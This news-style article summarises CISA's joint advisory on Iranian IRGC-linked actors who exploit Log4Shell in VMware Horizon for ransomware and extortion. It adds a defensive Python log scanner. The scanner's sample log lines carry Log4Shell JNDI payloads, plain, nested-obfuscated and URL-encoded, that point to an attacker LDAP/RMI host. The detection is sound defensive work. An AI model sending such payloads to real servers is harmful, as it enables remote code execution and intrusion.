The Cybersecurity and Infrastructure Security Agency (CISA), along with its partners, released a joint Cybersecurity Advisory (CSA), AA22-257A, on Sept. 14, 2022, warning agencies about continued malicious cyber activity from actors affiliated with the Iranian Government's Islamic Revolutionary Guard Corps (IRGC).
The CSA explains that the IRGC-affiliated actors often exploit the Log4j vulnerability known as Log4Shell (CVE-2021-44228) in unpatched VMware Horizon servers for initial access, then carry out disk encryption and data extortion for ransom.
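As an added illustration of the initial-access vector the advisory describes (example code written for this page, not anything from CISA's advisory, from VMware or from the FBI): a small scanner that hunts web-server access logs for Log4Shell lookup strings, including the nested-lookup and URL-encoded obfuscations attackers used to slip past naive searches for the literal `${jndi:`. The log lines, hosts, timestamps and request paths are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (Apache combined format) for illustration only.
# Hosts, timestamps and paths are invented; the payload shapes mirror the public
# Log4Shell probe patterns: plain, nested-lookup obfuscation, and URL-encoded.
SAMPLE_LOG = [
    # benign request
    '10.0.0.5 - - [14/Sep/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain lookup string in the User-Agent field
    '198.51.100.7 - - [14/Sep/2022:10:01:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    # case-lookup and default-value obfuscation hiding the letters of "jndi" and "ldap"
    '198.51.100.7 - - [14/Sep/2022:10:01:11 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/b}"',
    # URL-encoded lookup string in the request line
    '198.51.100.7 - - [14/Sep/2022:10:01:15 +0000] "GET /portal/info.jsp?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    # benign line that mentions jndi outside of a ${...} lookup
    '10.0.0.9 - - [14/Sep/2022:10:02:00 +0000] "GET /docs/jndi-ldap-howto.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# ${lookup:key:-default}  ->  default   (Log4j default-value syntax, abused to hide letters)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${lower:x} / ${upper:x}  ->  x        (case lookups, same purpose; we lowercase at the end)
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# A JNDI lookup with its scheme, e.g. ${jndi:ldap://...}
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding and the common Log4j lookup obfuscations; return lowercase text."""
    for _ in range(3):  # payloads in request URIs are sometimes encoded more than once
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):  # innermost lookups resolve first; repeat to peel nesting
        resolved = _CASE_RE.sub(r"\1", _DEFAULT_RE.sub(r"\1", text))
        if resolved == text:
            break
        text = resolved
    return text.lower()


def find_jndi_lookup(text):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if text carries a lookup, else None."""
    m = _JNDI_RE.search(normalize(text))
    return m.group(1).lower() if m else None


def scan_lines(lines):
    """Scan log lines; return one hit per line carrying a JNDI lookup string."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI_RE.search(norm)
        if m:
            hits.append({
                "line": n,
                "scheme": m.group(1).lower(),
                "lookup": norm[m.start():m.start() + 60],  # de-obfuscated excerpt for triage
            })
    return hits


if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG):
        print(f"line {h['line']}: {h['scheme']} lookup -> {h['lookup']}")
```

Run directly, it reports the three probe lines in the constructed sample and skips the two benign ones; in practice, feed `scan_lines` the lines from the Horizon host's web-tier logs. Two caveats a responder should keep in mind: a match only shows that a probe arrived, not that it succeeded, so the next step is to check for outbound LDAP or RMI connections from the server at the same timestamps; and a lookup string carried in an HTTP header the server does not log will never appear here, so this kind of detection supplements patching Horizon per VMware's guidance rather than replacing it.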
The initial reporting on these Iranian actors was released in May 2021 and updated in November 2021; it describes Iranian government-sponsored actors exploiting known Fortinet and Microsoft Exchange vulnerabilities.
Since then, the Federal Bureau of Investigation (FBI) has continued to observe activity from these advanced persistent threat (APT) actors.
“The FBI is dedicated to preventing and disrupting nation state affiliated cyber activity that threatens our private sector partners and the American public,” said FBI Cyber Division Assistant Director Bryan Vorndran in a press release. “We will continue to coordinate with our domestic and international partners to proactively share relevant and timely information to mitigate cyber threats posed by the IRGC.”
The CSA was released as a joint effort between CISA, the FBI, the National Security Agency, U.S. Cyber Command's Cyber National Mission Force, the Department of the Treasury, the Australian Cyber Security Centre, the Canadian Centre for Cyber Security, and the United Kingdom's National Cyber Security Centre.
“Today’s advisory is an outcome of our close collaboration with international and U.S. government partners to understand and provide timely information on malicious cyber activity targeting our country’s critical networks, including by Iranian cyber actors,” said Eric Goldstein, the executive assistant director for cybersecurity at CISA.
The advisory urges agencies to take immediate action to mitigate attacks by IRGC-affiliated actors: keep systems and software updated, prioritizing remediation of known exploited vulnerabilities; enforce multi-factor authentication; and maintain offline backups of data.